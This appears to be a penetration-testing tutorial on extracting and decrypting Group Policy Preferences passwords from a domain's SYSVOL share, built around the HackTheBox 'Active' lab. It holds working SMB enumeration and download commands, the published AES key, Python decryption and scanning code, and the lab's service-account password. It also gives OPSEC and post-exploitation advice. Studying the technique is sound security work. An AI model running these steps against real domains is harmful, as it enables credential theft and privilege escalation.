GPP Password Extraction
# Overview
Group Policy Preferences (GPP), introduced in Server 2008, allowed administrators to configure users, groups, and scheduled tasks across the domain. GPP supported storing passwords (e.g., for local admin accounts) in SYSVOL under Groups.xml, Services.xml, and Printers.xml. Microsoft published the AES-256 encryption key on MSDN in 2012, making all GPP-encrypted passwords trivially decryptable. Any authenticated domain user with SYSVOL read access can exploit this.
# Prerequisites
- SMB access to the SYSVOL or Replication share (anonymous or authenticated)
- Network access to the Domain Controller on port 445
# Detection & Enumeration
# SMB Share Discovery
```bash
# Check for accessible shares (anonymous)
smbclient -L //10.10.10.100
# Look for: SYSVOL, Replication (replica of SYSVOL)

# Verify access with smbmap
smbmap -H 10.10.10.100
# READ ONLY on Replication or SYSVOL is sufficient

# Connect and recursively download
smbclient //10.10.10.100/Replication
smb: \> RECURSE ON
smb: \> PROMPT OFF
smb: \> mget *
# This downloads all files including Groups.xml

# With credentials
smbmap -d active.htb -u SVC_TGS -p 'GPPstillStandingStrong2k18' -H 10.10.10.100
```
# Key Files to Search
GPP passwords can appear in:
- Groups.xml — local user accounts with a cpassword attribute
- Services.xml — service account passwords
- Printers.xml — printer configuration passwords
- Drives.xml — mapped drive credentials
- DataSources.xml — data source connection strings

The standard path is:
```text
\\<domain>\SYSVOL\<domain>\Policies\{<GUID>}\Machine\Preferences\Groups\Groups.xml
```
# netexec GPP Module
```bash
# Automated GPP password search
netexec smb 10.10.10.100 -u user -p pass -M gpp_password
# Searches SYSVOL for cpassword attributes automatically

# Without credentials (if null session)
netexec smb 10.10.10.100 --shares
```
# Exploitation / Execution
# gpp-decrypt Tool
```bash
# Extract the cpassword value from Groups.xml
# cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

# Decrypt using gpp-decrypt
gpp-decrypt edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ
# Output: GPPstillStandingStrong2k18
```
# Sample Groups.xml Structure
```xml
<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
  <User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}"
        name="active.htb\SVC_TGS" image="2"
        changed="2018-07-18 20:46:06"
        uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
    <Properties action="U" newName="" fullName="" description=""
                cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
                changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0"
                userName="active.htb\SVC_TGS"/>
  </User>
</Groups>
```
# Manual Decryption (Python)
```python
# The GPP AES key is publicly known:
# 4e 99 06 e8 fc b6 6c c9 fa f4 93 10 62 0f fe e8
# f4 96 e8 06 cc 05 79 90 20 9b 09 a4 33 b6 6c 1b
import base64
from Crypto.Cipher import AES            # pycryptodome
from Crypto.Util.Padding import unpad

key = b'\x4e\x99\x06\xe8\xfc\xb6\x6c\xc9\xfa\xf4\x93\x10\x62\x0f\xfe\xe8\xf4\x96\xe8\x06\xcc\x05\x79\x90\x20\x9b\x09\xa4\x33\xb6\x6c\x1b'
cpassword = "edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"

# cpassword is stored without base64 padding; restore it or b64decode() raises "Incorrect padding"
cpassword += "=" * (-len(cpassword) % 4)
encrypted = base64.b64decode(cpassword)

# AES-256-CBC with an all-zero IV; the plaintext is PKCS#7-padded UTF-16-LE,
# so strip the PKCS#7 bytes (not NULs) before decoding
cipher = AES.new(key, AES.MODE_CBC, iv=b'\x00' * 16)
decrypted = unpad(cipher.decrypt(encrypted), AES.block_size)
print(decrypted.decode('utf-16-le'))
```
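The following Python example is added here and is not from the original page or from any of the tools it references. It ties the "Key Files to Search" and "Manual Decryption" sections together: it walks a downloaded SYSVOL/Replication tree, pulls every non-empty cpassword attribute out of the preference files listed above, and decrypts each one with the published key. The sample tree is constructed inline from the Groups.xml shown on this page plus a Drives.xml with an empty cpassword (to show that empty values are skipped); the policy GUID directory name is a placeholder, pycryptodome is optional and only needed for the decryption step, and the accountName fallback for Services.xml is an assumption.

```python
import base64
import tempfile
import xml.etree.ElementTree as ET
from pathlib import Path

try:
    from Crypto.Cipher import AES            # pycryptodome, optional: only decrypt needs it
    from Crypto.Util.Padding import unpad
    HAVE_AES = True
except ImportError:
    HAVE_AES = False

# AES-256 key Microsoft published on MSDN (same bytes as the manual decryption section)
GPP_AES_KEY = bytes.fromhex(
    "4e9906e8fcb66cc9faf49310620ffee8f496e806cc057990209b09a433b66c1b"
)

# Preference files that can carry a cpassword attribute (the "Key Files to Search" list)
GPP_FILES = {"Groups.xml", "Services.xml", "Printers.xml", "Drives.xml", "DataSources.xml"}


def pad_b64(value: str) -> str:
    """cpassword is stored without base64 padding; restore it so b64decode() accepts it."""
    return value + "=" * (-len(value) % 4)


def decode_cpassword(cpassword: str) -> bytes:
    """Return the raw AES ciphertext (a whole number of 16-byte blocks)."""
    return base64.b64decode(pad_b64(cpassword))


def decrypt_cpassword(cpassword: str) -> str:
    """AES-256-CBC with a zero IV; plaintext is PKCS#7-padded UTF-16-LE."""
    if not HAVE_AES:
        raise RuntimeError("pycryptodome is required for decryption")
    cipher = AES.new(GPP_AES_KEY, AES.MODE_CBC, iv=b"\x00" * 16)
    plain = unpad(cipher.decrypt(decode_cpassword(cpassword)), AES.block_size)
    return plain.decode("utf-16-le")


def find_cpasswords(root_dir) -> list:
    """Walk a downloaded SYSVOL/Replication tree and collect every non-empty cpassword."""
    root_dir = Path(root_dir)
    findings = []
    for path in sorted(root_dir.rglob("*.xml")):
        if path.name not in GPP_FILES:
            continue
        try:
            tree = ET.parse(path)
        except ET.ParseError:
            continue                       # malformed file: skip it rather than abort the scan
        for elem in tree.iter():
            cpassword = elem.get("cpassword")
            if not cpassword:              # attribute absent or cpassword="" (no stored secret)
                continue
            findings.append({
                "file": str(path.relative_to(root_dir)),
                "element": elem.tag,
                # Groups/Drives use userName; Services.xml uses accountName (assumption)
                "account": elem.get("userName") or elem.get("accountName") or "",
                "cpassword": cpassword,
            })
    return findings


# Constructed sample tree: the page's Groups.xml plus a Drives.xml whose cpassword is empty
SAMPLE_GROUPS_XML = r'''<?xml version="1.0" encoding="utf-8"?>
<Groups clsid="{3125E937-EB16-4b4c-9934-544FC6D24D26}">
<User clsid="{DF5F1855-51E5-4d24-8B1A-D9BDE98BA1D1}" name="active.htb\SVC_TGS" image="2"
changed="2018-07-18 20:46:06" uid="{EF57DA28-5F69-4530-A59E-AAB58578219D}">
<Properties action="U" newName="" fullName="" description=""
cpassword="edBSHOwhZLTjt/QS9FeIcJ83mjWA98gw9guKOhJOdcqh+ZGMeXOsQbCpZ3xUjTLfCuNH8pG5aSVYdYw/NglVmQ"
changeLogon="0" noChange="1" neverExpires="1" acctDisabled="0" userName="active.htb\SVC_TGS"/>
</User>
</Groups>'''

SAMPLE_DRIVES_XML = r'''<?xml version="1.0" encoding="utf-8"?>
<Drives>
<Drive name="S:"><Properties action="U" path="\\fs01\share" userName="EXAMPLE\mapuser" cpassword=""/></Drive>
</Drives>'''


def build_sample_tree() -> Path:
    """Write the constructed files under a SYSVOL-shaped temp directory (GUID is a placeholder)."""
    root = Path(tempfile.mkdtemp(prefix="sysvol_"))
    prefs = root / "active.htb" / "Policies" / "{PLACEHOLDER-GUID}" / "Machine" / "Preferences"
    for sub, body in (("Groups", SAMPLE_GROUPS_XML), ("Drives", SAMPLE_DRIVES_XML)):
        (prefs / sub).mkdir(parents=True)
        (prefs / sub / f"{sub}.xml").write_text(body, encoding="utf-8")
    return root


if __name__ == "__main__":
    for hit in find_cpasswords(build_sample_tree()):
        shown = decrypt_cpassword(hit["cpassword"]) if HAVE_AES else "<install pycryptodome>"
        print(f'{hit["file"]}: {hit["account"]} -> {shown}')
```

Point `find_cpasswords()` at the directory produced by the recursive `mget` above, or at a copy of your own domain's SYSVOL: the same scan is how a defender confirms that no legacy cpassword values are still sitting in policy files, since the MS14-025 update stopped new passwords from being written but left existing ones in place.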
# Common Pitfalls
- SYSVOL not accessible anonymously: Many modern domains restrict SYSVOL to authenticated users only. Obtain any domain credential first.
- No cpassword attributes found: The organization may not use GPP for password deployment. Move to other techniques.
- gpp-decrypt not installed: Use the Python manual method or compile from source.
# OPSEC Considerations
- Reading SYSVOL files generates standard SMB file access logs
- GPP password extraction is entirely passive from the DC's perspective — no Kerberos or authentication events beyond the initial SMB connection
- This is considered low-hanging fruit and is often flagged by Microsoft's own security baseline assessments
# Post-Exploitation Value
- The decrypted account may be a service account with elevated AD privileges
- The account may have WinRM access for remote shell
- Password reuse may allow access to additional accounts
- The foothold account enables authenticated BloodHound ingestion and Kerberoasting
# Cross-References
# Tool References
| Tool | Link |
|---|---|
| gpp-decrypt | Built into Kali; also available at https://github.com/t0thkr1s/gpp-decrypt |
| netexec | https://github.com/Pennyw0rth/NetExec |
| smbmap | https://github.com/ShawnDEvans/SMBMap |
# Source Machines
- Active (Easy) — Anonymous access to Replication share -> Groups.xml -> cpassword -> SVC_TGS:GPPstillStandingStrong2k18 -> Kerberoasting -> Administrator